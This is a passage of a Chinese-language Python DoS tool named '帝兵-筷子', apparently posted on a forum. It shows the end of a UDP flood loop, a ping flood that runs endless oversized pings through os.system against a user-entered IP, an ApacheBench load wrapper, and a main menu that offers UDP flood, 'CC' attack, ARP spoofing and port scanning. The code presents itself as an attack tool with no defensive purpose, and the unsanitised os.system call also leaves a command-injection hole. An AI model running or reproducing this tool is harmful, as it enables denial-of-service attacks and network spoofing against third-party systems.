print(f"\r{Colors.GREEN}已发送 {sent} 个数据包到 {ip} 端口 {port}{Colors.END}", end="", flush=True)
time.sleep((1000 - sd) / 2000)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 UDP攻击停止,总共发送 {sent} 个数据包{Colors.END}")
except Exception as e:
print(f"\n{Colors.RED}❌ 发生错误: {e}{Colors.END}")
finally:
sock.close()
def ping_flood():
"""Ping洪水攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🎯 Ping洪水攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
print(f"\n{Colors.RED}💥 开始Ping攻击 {Colors.CYAN}{ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sent = 0
start_time = time.time()
try:
while True:
# 使用系统ping命令
response = os.system(f"ping -c 1 -s 65500 {ip} > /dev/null 2>&1")
sent += 1
elapsed_time = time.time() - start_time
speed_actual = sent / elapsed_time if elapsed_time > 0 else 0
print(f"\r{Colors.GREEN}📤 已发送: {sent} Ping包 | ⚡ 速度: {speed_actual:.1f} 包/秒 | ⏱️ 时长: {elapsed_time:.1f}秒{Colors.END}", end="", flush=True)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 Ping攻击停止,总共发送 {sent} 个数据包{Colors.END}")
def apache_bench_test():
"""ApacheBench (ab) 压力测试"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🛠️ ApacheBench (ab) 压力测试{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# 检查ab是否安装
try:
subprocess.run(["ab", "-V"], check=True, capture_output=True)
except:
print(f"{Colors.RED}❌ ApacheBench (ab) 未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请安装: pkg install apache2-utils 或 sudo apt install apache2-utils{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
url = input(f"{Colors.YELLOW}🎯 目标URL (包含http://): {Colors.END}")
requests_count = int(input(f"{Colors.YELLOW}📊 总请求数: {Colors.END}"))
concurrency = int(input(f"{Colors.YELLOW}⚡ 并发数: {Colors.END}"))
print(f"\n{Colors.RED}💥 开始ApacheBench测试...{Colors.END}")
print(f"{Colors.YELLOW}🎯 目标: {url}{Colors.END}")
print(f"{Colors.YELLOW}📊 总请求: {requests_count} | 并发: {concurrency}{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
try:
# 执行ab命令
cmd = ["ab", "-n", str(requests_count), "-c", str(concurrency), url]
result = subprocess.run(cmd, capture_output=True, text=True)
print(f"{Colors.CYAN}📊 测试结果:{Colors.END}")
print(f"{Colors.WHITE}{result.stdout}{Colors.END}")
if result.stderr:
print(f"{Colors.RED}❌ 错误信息:{Colors.END}")
print(f"{Colors.WHITE}{result.stderr}{Colors.END}")
except Exception as e:
print(f"{Colors.RED}❌ 执行错误: {e}{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
def main_menu():
"""主菜单"""
while True:
print_banner()
print_menu()
choice = input(f"\n{Colors.YELLOW}🎯 请选择功能 (1-8): {Colors.END}")
if choice == '1':
udp_flood_original() # 原始UDP攻击版本
elif choice == '2':
super_cc_attack() # 超级CC攻击
elif choice == '3':
arp_spoof() # ARP欺骗攻击
elif choice == '4':
quick_port_scan() # 快速端口扫描
elif choice == '5':
ping_flood() # Ping洪水攻击
elif choice == '6':
apache_bench_test() # ApacheBench测试
elif choice == '7':
show_system_info() # 系统信息
elif choice == '8':
print(f"\n{Colors.CYAN}👋 感谢使用帝兵-筷子,再见!{Colors.END}")
exit()
else:
print(f"\n{Colors.RED}❌ 无效选择,请重新输入{Colors.END}")
time.sleep(1)
continue
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
if __name__ == "__main__":
try:
# 检查基本依赖
missing_deps = check_dependencies()
if missing_deps:
print(f"{Colors.RED}警告: 缺少依赖 {', '.join(missing_deps)}")
print(f"请运行: pip install {' '.join(missing_deps)}{Colors.END}")
time.sleep(2)
main_menu()
except KeyboardInterrupt:
print(f"\n\n{Colors.CYAN}👋 程序已退出{Colors.END}")
使用道具 举报